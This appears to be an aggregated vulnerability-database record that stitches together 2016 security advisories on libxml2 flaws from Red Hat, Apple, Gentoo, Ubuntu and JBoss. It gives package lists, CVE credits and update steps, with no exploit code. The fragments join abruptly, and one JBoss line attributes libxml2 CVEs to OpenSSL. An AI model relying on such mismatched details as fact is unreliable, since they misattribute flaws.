x86_64: libxml2-2.7.6-21.el6_8.1.i686.rpm libxml2-2.7.6-21.el6_8.1.x86_64.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm libxml2-devel-2.7.6-21.el6_8.1.i686.rpm libxml2-devel-2.7.6-21.el6_8.1.x86_64.rpm libxml2-python-2.7.6-21.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386: libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm libxml2-static-2.7.6-21.el6_8.1.i686.rpm
ppc64: libxml2-debuginfo-2.7.6-21.el6_8.1.ppc64.rpm libxml2-static-2.7.6-21.el6_8.1.ppc64.rpm
s390x: libxml2-debuginfo-2.7.6-21.el6_8.1.s390x.rpm libxml2-static-2.7.6-21.el6_8.1.s390x.rpm
x86_64: libxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm libxml2-static-2.7.6-21.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: libxml2-2.7.6-21.el6_8.1.src.rpm
i386: libxml2-2.7.6-21.el6_8.1.i686.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm libxml2-devel-2.7.6-21.el6_8.1.i686.rpm libxml2-python-2.7.6-21.el6_8.1.i686.rpm
x86_64: libxml2-2.7.6-21.el6_8.1.i686.rpm libxml2-2.7.6-21.el6_8.1.x86_64.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm libxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm libxml2-devel-2.7.6-21.el6_8.1.i686.rpm libxml2-devel-2.7.6-21.el6_8.1.x86_64.rpm libxml2-python-2.7.6-21.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm libxml2-static-2.7.6-21.el6_8.1.i686.rpm
x86_64: libxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm libxml2-static-2.7.6-21.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source: libxml2-2.9.1-6.el7_2.3.src.rpm
x86_64: libxml2-2.9.1-6.el7_2.3.i686.rpm libxml2-2.9.1-6.el7_2.3.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm libxml2-python-2.9.1-6.el7_2.3.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm libxml2-devel-2.9.1-6.el7_2.3.i686.rpm libxml2-devel-2.9.1-6.el7_2.3.x86_64.rpm libxml2-static-2.9.1-6.el7_2.3.i686.rpm libxml2-static-2.9.1-6.el7_2.3.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: libxml2-2.9.1-6.el7_2.3.src.rpm
x86_64: libxml2-2.9.1-6.el7_2.3.i686.rpm libxml2-2.9.1-6.el7_2.3.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm libxml2-python-2.9.1-6.el7_2.3.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm libxml2-devel-2.9.1-6.el7_2.3.i686.rpm libxml2-devel-2.9.1-6.el7_2.3.x86_64.rpm libxml2-static-2.9.1-6.el7_2.3.i686.rpm libxml2-static-2.9.1-6.el7_2.3.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: libxml2-2.9.1-6.el7_2.3.src.rpm
ppc64: libxml2-2.9.1-6.el7_2.3.ppc.rpm libxml2-2.9.1-6.el7_2.3.ppc64.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.ppc.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.ppc64.rpm libxml2-devel-2.9.1-6.el7_2.3.ppc.rpm libxml2-devel-2.9.1-6.el7_2.3.ppc64.rpm libxml2-python-2.9.1-6.el7_2.3.ppc64.rpm
ppc64le: libxml2-2.9.1-6.el7_2.3.ppc64le.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.ppc64le.rpm libxml2-devel-2.9.1-6.el7_2.3.ppc64le.rpm libxml2-python-2.9.1-6.el7_2.3.ppc64le.rpm
s390x: libxml2-2.9.1-6.el7_2.3.s390.rpm libxml2-2.9.1-6.el7_2.3.s390x.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.s390.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.s390x.rpm libxml2-devel-2.9.1-6.el7_2.3.s390.rpm libxml2-devel-2.9.1-6.el7_2.3.s390x.rpm libxml2-python-2.9.1-6.el7_2.3.s390x.rpm
x86_64: libxml2-2.9.1-6.el7_2.3.i686.rpm libxml2-2.9.1-6.el7_2.3.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm libxml2-devel-2.9.1-6.el7_2.3.i686.rpm libxml2-devel-2.9.1-6.el7_2.3.x86_64.rpm libxml2-python-2.9.1-6.el7_2.3.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: libxml2-debuginfo-2.9.1-6.el7_2.3.ppc.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.ppc64.rpm libxml2-static-2.9.1-6.el7_2.3.ppc.rpm libxml2-static-2.9.1-6.el7_2.3.ppc64.rpm
ppc64le: libxml2-debuginfo-2.9.1-6.el7_2.3.ppc64le.rpm libxml2-static-2.9.1-6.el7_2.3.ppc64le.rpm
s390x: libxml2-debuginfo-2.9.1-6.el7_2.3.s390.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.s390x.rpm libxml2-static-2.9.1-6.el7_2.3.s390.rpm libxml2-static-2.9.1-6.el7_2.3.s390x.rpm
x86_64: libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm libxml2-static-2.9.1-6.el7_2.3.i686.rpm libxml2-static-2.9.1-6.el7_2.3.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: libxml2-2.9.1-6.el7_2.3.src.rpm
x86_64: libxml2-2.9.1-6.el7_2.3.i686.rpm libxml2-2.9.1-6.el7_2.3.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm libxml2-devel-2.9.1-6.el7_2.3.i686.rpm libxml2-devel-2.9.1-6.el7_2.3.x86_64.rpm libxml2-python-2.9.1-6.el7_2.3.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm libxml2-static-2.9.1-6.el7_2.3.i686.rpm libxml2-static-2.9.1-6.el7_2.3.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2016-1762 https://access.redhat.com/security/cve/CVE-2016-1833 https://access.redhat.com/security/cve/CVE-2016-1834 https://access.redhat.com/security/cve/CVE-2016-1835 https://access.redhat.com/security/cve/CVE-2016-1836 https://access.redhat.com/security/cve/CVE-2016-1837 https://access.redhat.com/security/cve/CVE-2016-1838 https://access.redhat.com/security/cve/CVE-2016-1839 https://access.redhat.com/security/cve/CVE-2016-1840 https://access.redhat.com/security/cve/CVE-2016-3627 https://access.redhat.com/security/cve/CVE-2016-3705 https://access.redhat.com/security/cve/CVE-2016-4447 https://access.redhat.com/security/cve/CVE-2016-4448 https://access.redhat.com/security/cve/CVE-2016-4449 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
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-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
APPLE-SA-2016-05-16-2 iOS 9.3.2
iOS 9.3.2 is now available and addresses the following:
Accessibility Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to determine kernel memory layout Description: A buffer overflow was addressed through improved size validation. CVE-ID CVE-2016-1790 : Rapelly Akhil
CFNetwork Proxies Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An attacker in a privileged network position may be able to leak sensitive user information Description: An information leak existed in the handling of HTTP and HTTPS requests. This issue was addressed through improved URL handling. CVE-ID CVE-2016-1801 : Alex Chapman and Paul Stone of Context Information Security
CommonCrypto Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A malicious application may be able to leak sensitive user information Description: An issue existed in the handling of return values in CCCrypt. This issue was addressed through improved key length management. CVE-ID CVE-2016-1802 : Klaus Rodewig
CoreCapture Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: A null pointer dereference was addressed through improved validation. CVE-ID CVE-2016-1803 : Ian Beer of Google Project Zero, daybreaker working with Trend Micro’s Zero Day Initiative
Disk Images Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A local attacker may be able to read kernel memory Description: A race condition was addressed through improved locking. CVE-ID CVE-2016-1807 : Ian Beer of Google Project Zero
Disk Images Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the parsing of disk images. This issue was addressed through improved memory handling. CVE-ID CVE-2016-1808 : Moony Li (@Flyic) and Jack Tang (@jacktang310) of Trend Micro
ImageIO Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Processing a maliciously crafted image may lead to a denial of service Description: A null pointer dereference was addressed through improved validation. CVE-ID CVE-2016-1811 : Lander Brandt (@landaire)
IOAcceleratorFamily Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1817 : Moony Li (@Flyic) and Jack Tang (@jacktang310) of Trend Micro working with Trend Micro's Zero Day Initiative CVE-2016-1818 : Juwei Lin of TrendMicro CVE-2016-1819 : Ian Beer of Google Project Zero
IOAcceleratorFamily Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to cause a denial of service Description: A null pointer dereference was addressed through improved locking. CVE-ID CVE-2016-1814 : Juwei Lin of TrendMicro
IOAcceleratorFamily Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: A null pointer dereference was addressed through improved validation. CVE-ID CVE-2016-1813 : Ian Beer of Google Project Zero
IOHIDFamily Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved memory handling. CVE-ID CVE-2016-1823 : Ian Beer of Google Project Zero CVE-2016-1824 : Marco Grassi (@marcograss) of KeenLab (@keen_lab), Tencent
Kernel Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1827 : Brandon Azad CVE-2016-1828 : Brandon Azad CVE-2016-1829 : CESG CVE-2016-1830 : Brandon Azad CVE-2016-1831 : Brandon Azad
libc Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A local attacker may be able to cause unexpected application termination or arbitrary code execution Description: A memory corruption issue was addressed through improved input validation. CVE-ID CVE-2016-1832 : Karl Williamson
libxml2 Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Processing maliciously crafted XML may lead to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1833 : Mateusz Jurczyk CVE-2016-1834 : Apple CVE-2016-1835 : Wei Lei and Liu Yang of Nanyang Technological University CVE-2016-1836 : Wei Lei and Liu Yang of Nanyang Technological University CVE-2016-1837 : Wei Lei and Liu Yang of Nanyang Technological University CVE-2016-1838 : Mateusz Jurczyk CVE-2016-1839 : Mateusz Jurczyk CVE-2016-1840 : Kostya Serebryany
libxslt Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: A memory corruption issue was addressed through improved memory handling. CVE-ID CVE-2016-1841 : Sebastian Apelt
MapKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An attacker in a privileged network position may be able to leak sensitive user information Description: Shared links were sent with HTTP rather than HTTPS. This was addressed by enabling HTTPS for shared links. CVE-ID CVE-2016-1842 : Richard Shupak (https://www.linkedin.com/in/rshupak)
OpenGL Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1847 : Tongbo Luo and Bo Qu of Palo Alto Networks
Safari Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A user may be unable to fully delete browsing history Description: "Clear History and Website Data" did not clear the history. The issue was addressed through improved data deletion. CVE-ID CVE-2016-1849 : Adham Ghrayeb
Siri Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A person with physical access to an iOS device may be able to use Siri to access contacts and photos from the the lock screen Description: A state management issue existed when accessing Siri results on the lock screen. This issue was addressed by disabling data detectors in Twitter results when the device is locked. CVE-ID CVE-2016-1852 : videosdebarraquito
WebKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a malicious website may disclose data from another website Description: An insufficient taint tracking issue in the parsing of svg images was addressed through improved taint tracking. CVE-ID CVE-2016-1858 : an anonymous researcher
WebKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1854 : Anonymous working with Trend Micro's Zero Day Initiative CVE-2016-1855 : Tongbo Luo and Bo Qu of Palo Alto Networks CVE-2016-1856 : lokihardt working with Trend Micro's Zero Day Initiative CVE-2016-1857 : Jeonghoon Shin@A.D.D, Liang Chen, Zhen Feng, wushi of KeenLab, Tencent working with Trend Micro's Zero Day Initiative
WebKit Canvas Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1859 : Liang Chen, wushi of KeenLab, Tencent working with Trend Micro's Zero Day Initiative
Installation note:
This update is available through iTunes and Software Update on your iOS device, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
- Navigate to Settings
- Select General
- Select About. The version after applying this update will be "9.3.2". - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201701-37
https://security.gentoo.org/
Severity: Normal Title: libxml2: Multiple vulnerabilities Date: January 16, 2017 Bugs: #564776, #566374, #572878, #573820, #577998, #582538, #582540, #583888, #589816, #597112, #597114, #597116 ID: 201701-37
Synopsis
Multiple vulnerabilities have been found in libxml2, the worst of which could lead to the execution of arbitrary code.
Background
libxml2 is the XML (eXtended Markup Language) C parser and toolkit initially developed for the Gnome project.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-libs/libxml2 < 2.9.4-r1 >= 2.9.4-r1
Description
Multiple vulnerabilities have been discovered in libxml2. Please review the CVE identifiers referenced below for details.
Workaround
There is no known workaround at this time.
Resolution
All libxml2 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/libxml2-2.9.4-r1"
References
[ 1 ] CVE-2015-1819 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1819 [ 2 ] CVE-2015-5312 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5312 [ 3 ] CVE-2015-7497 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7497 [ 4 ] CVE-2015-7498 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7498 [ 5 ] CVE-2015-7499 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7499 [ 6 ] CVE-2015-7500 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7500 [ 7 ] CVE-2015-7941 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7941 [ 8 ] CVE-2015-7942 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7942 [ 9 ] CVE-2015-8035 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8035 [ 10 ] CVE-2015-8242 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8242 [ 11 ] CVE-2015-8806 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8806 [ 12 ] CVE-2016-1836 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1836 [ 13 ] CVE-2016-1838 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1838 [ 14 ] CVE-2016-1839 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1839 [ 15 ] CVE-2016-1840 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1840 [ 16 ] CVE-2016-2073 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2073 [ 17 ] CVE-2016-3627 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3627 [ 18 ] CVE-2016-3705 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3705 [ 19 ] CVE-2016-4483 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4483 [ 20 ] CVE-2016-4658 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4658 [ 21 ] CVE-2016-5131 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5131
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201701-37
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2017 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. From: Marc Deslauriers marc.deslauriers@canonical.com Reply-To: Ubuntu Security security@ubuntu.com To: ubuntu-security-announce@lists.ubuntu.com Message-ID: 5755B7E3.5040103@canonical.com Subject: [USN-2994-1] libxml2 vulnerabilities
============================================================================ Ubuntu Security Notice USN-2994-1 June 06, 2016
libxml2 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.04 LTS
- Ubuntu 15.10
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Several security issues were fixed in libxml2. (CVE-2015-8806, CVE-2016-2073, CVE-2016-3627, CVE-2016-3705, CVE-2016-4447)
It was discovered that libxml2 incorrectly handled certain malformed documents. (CVE-2016-1762, CVE-2016-1834)
Mateusz Jurczyk discovered that libxml2 incorrectly handled certain malformed documents. (CVE-2016-1833, CVE-2016-1838, CVE-2016-1839)
Wei Lei and Liu Yang discovered that libxml2 incorrectly handled certain malformed documents. (CVE-2016-1835, CVE-2016-1837)
Wei Lei and Liu Yang discovered that libxml2 incorrectly handled certain malformed documents. This issue only applied to Ubuntu 14.04 LTS, Ubuntu 15.10 and Ubuntu 16.04 LTS. (CVE-2016-1836)
Kostya Serebryany discovered that libxml2 incorrectly handled certain malformed documents. (CVE-2016-1840)
It was discovered that libxml2 would load certain XML external entities. (CVE-2016-4449)
Gustavo Grieco discovered that libxml2 incorrectly handled certain malformed documents. (CVE-2016-4483)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 16.04 LTS: libxml2 2.9.3+dfsg1-1ubuntu0.1
Ubuntu 15.10: libxml2 2.9.2+zdfsg1-4ubuntu0.4
Ubuntu 14.04 LTS: libxml2 2.9.1+dfsg1-3ubuntu4.8
Ubuntu 12.04 LTS: libxml2 2.7.8.dfsg-5.1ubuntu4.15
After a standard system update you need to reboot your computer to make all the necessary changes.
For the stable distribution (jessie), these problems have been fixed in version 2.9.1+dfsg1-5+deb8u2. Description:
This release of Red Hat JBoss Core Services httpd 2.4.23 serves as a replacement for JBoss Core Services Apache HTTP Server 2.4.6.
Security Fix(es):
-
This update fixes several flaws in OpenSSL. (CVE-2016-1762, CVE-2016-1833, CVE-2016-1834, CVE-2016-1835, CVE-2016-1836, CVE-2016-1837, CVE-2016-1838, CVE-2016-1839, CVE-2016-1840, CVE-2016-3627, CVE-2016-3705, CVE-2016-4447, CVE-2016-4448, CVE-2016-4449, CVE-2016-4483)
-
This update fixes three flaws in curl. (CVE-2016-5419, CVE-2016-5420, CVE-2016-7141)
-
This update fixes two flaws in httpd. (CVE-2016-4459, CVE-2016-8612)
-
A buffer overflow flaw when concatenating virtual host names and URIs was fixed in mod_jk. (CVE-2016-6808)
-
A memory leak flaw was fixed in expat. Upstream acknowledges Stephen Henson (OpenSSL development team) as the original reporter of CVE-2015-0286; Huzaifa Sidhpurwala (Red Hat), Hanno BAPck, and David Benjamin (Google) as the original reporters of CVE-2016-2108; Guido Vranken as the original reporter of CVE-2016-2105, CVE-2016-2106, CVE-2016-0797, CVE-2016-0799, and CVE-2016-2842; Juraj Somorovsky as the original reporter of CVE-2016-2107; Yuval Yarom (University of Adelaide and NICTA), Daniel Genkin (Technion and Tel Aviv University), and Nadia Heninger (University of Pennsylvania) as the original reporters of CVE-2016-0702; and Adam Langley (Google/BoringSSL) as the original reporter of CVE-2016-0705.
See the corresponding CVE pages linked to in the References section for more information about each of the flaws listed in this advisory. Solution:
The References section of this erratum contains a download link (you must log in to download the update). Before applying the update, back up your existing Red Hat JBoss Web Server installation (including all applications and configuration files).
After installing the updated packages, the httpd daemon will be restarted automatically. JIRA issues fixed (https://issues.jboss.org/):
JBCS-50 - CVE-2012-1148 CVE-2012-0876 expat: various flaws [jbews-3.0.0] JBCS-95 - CVE-2014-3523 httpd: WinNT MPM denial of service
6
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"description": {
"_id": null,
"data": "The xmlDictAddString function in libxml2 before 2.9.4, as used in Apple iOS before 9.3.2, OS X before 10.11.5, tvOS before 9.2.1, and watchOS before 2.2.1, allows remote attackers to cause a denial of service (heap-based buffer over-read) via a crafted XML document. Apple Mac OS X, watchOS, iOS, and tvOS are prone to multiple security vulnerabilities. \nAttackers can exploit these issues to execute arbitrary code and bypass security restrictions. Failed exploit attempts may result in a denial-of-service condition. \nVersions prior to iOS 9.3.2, watchOS 2.2.1, Mac OS X 10.11.5, and tvOS 9.2.1 are vulnerable. in the United States. Apple iOS is an operating system developed for mobile devices; watchOS is a smart watch operating system; OS X El Capitan is a dedicated operating system developed for Mac computers; tvOS is a smart TV operating system. It supports multiple encoding formats, XPath analysis, Well-formed and valid verification, etc. \nCVE-ID\nCVE-2016-1847 : Tongbo Luo and Bo Qu of Palo Alto Networks\n\nInstallation note:\n\nInstructions on how to update your Apple Watch software are\navailable at https://support.apple.com/en-us/HT204641\n\nTo check the version on your Apple Watch, open the Apple Watch app\non your iPhone and select \"My Watch \u003e General \u003e About\". -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: libxml2 security update\nAdvisory ID: RHSA-2016:1292-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2016:1292\nIssue date: 2016-06-23\nCVE Names: CVE-2016-1762 CVE-2016-1833 CVE-2016-1834 \n CVE-2016-1835 CVE-2016-1836 CVE-2016-1837 \n CVE-2016-1838 CVE-2016-1839 CVE-2016-1840 \n CVE-2016-3627 CVE-2016-3705 CVE-2016-4447 \n CVE-2016-4448 CVE-2016-4449 \n=====================================================================\n\n1. Summary:\n\nAn update for libxml2 is now available for Red Hat Enterprise Linux 6 and\nRed Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nThe libxml2 library is a development toolbox providing the implementation\nof various XML standards. \n\nSecurity Fix(es):\n\nA heap-based buffer overflow flaw was found in the way libxml2 parsed\ncertain crafted XML input. A remote attacker could provide a specially\ncrafted XML file that, when opened in an application linked against\nlibxml2, would cause the application to crash or execute arbitrary code\nwith the permissions of the user running the application. (CVE-2016-1834,\nCVE-2016-1840)\n\nMultiple denial of service flaws were found in libxml2. A remote attacker\ncould provide a specially crafted XML file that, when processed by an\napplication using libxml2, could cause that application to crash. \n(CVE-2016-1762, CVE-2016-1833, CVE-2016-1835, CVE-2016-1836, CVE-2016-1837,\nCVE-2016-1838, CVE-2016-1839, CVE-2016-3627, CVE-2016-3705, CVE-2016-4447,\nCVE-2016-4448, CVE-2016-4449)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nFor the update to take effect, all applications linked to the libxml2\nlibrary must be restarted, or the system rebooted. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1319829 - CVE-2016-3627 libxml2: stack exhaustion while parsing xml files in recovery mode\n1332443 - CVE-2016-3705 libxml2: stack overflow before detecting invalid XML file\n1338682 - CVE-2016-1833 libxml2: Heap-based buffer overread in htmlCurrentChar\n1338686 - CVE-2016-4447 libxml2: Heap-based buffer underreads due to xmlParseName\n1338691 - CVE-2016-1835 libxml2: Heap use-after-free in xmlSAX2AttributeNs\n1338696 - CVE-2016-1837 libxml2: Heap use-after-free in htmlPArsePubidLiteral and htmlParseSystemiteral\n1338700 - CVE-2016-4448 libxml2: Format string vulnerability\n1338701 - CVE-2016-4449 libxml2: Inappropriate fetch of entities content\n1338702 - CVE-2016-1836 libxml2: Heap use-after-free in xmlDictComputeFastKey\n1338703 - CVE-2016-1839 libxml2: Heap-based buffer overread in xmlDictAddString\n1338705 - CVE-2016-1838 libxml2: Heap-based buffer overread in xmlPArserPrintFileContextInternal\n1338706 - CVE-2016-1840 libxml2: Heap-buffer-overflow in xmlFAParserPosCharGroup\n1338708 - CVE-2016-1834 libxml2: Heap-buffer-overflow in xmlStrncat\n1338711 - CVE-2016-1762 libxml2: Heap-based buffer-overread in xmlNextChar\n\n6. Package List:\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nlibxml2-2.7.6-21.el6_8.1.src.rpm\n\nx86_64:\nlibxml2-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-python-2.7.6-21.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nlibxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.i686.rpm\nlibxml2-devel-2.7.6-21.el6_8.1.x86_64.rpm\nlibxml2-static-2.7.6-21.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 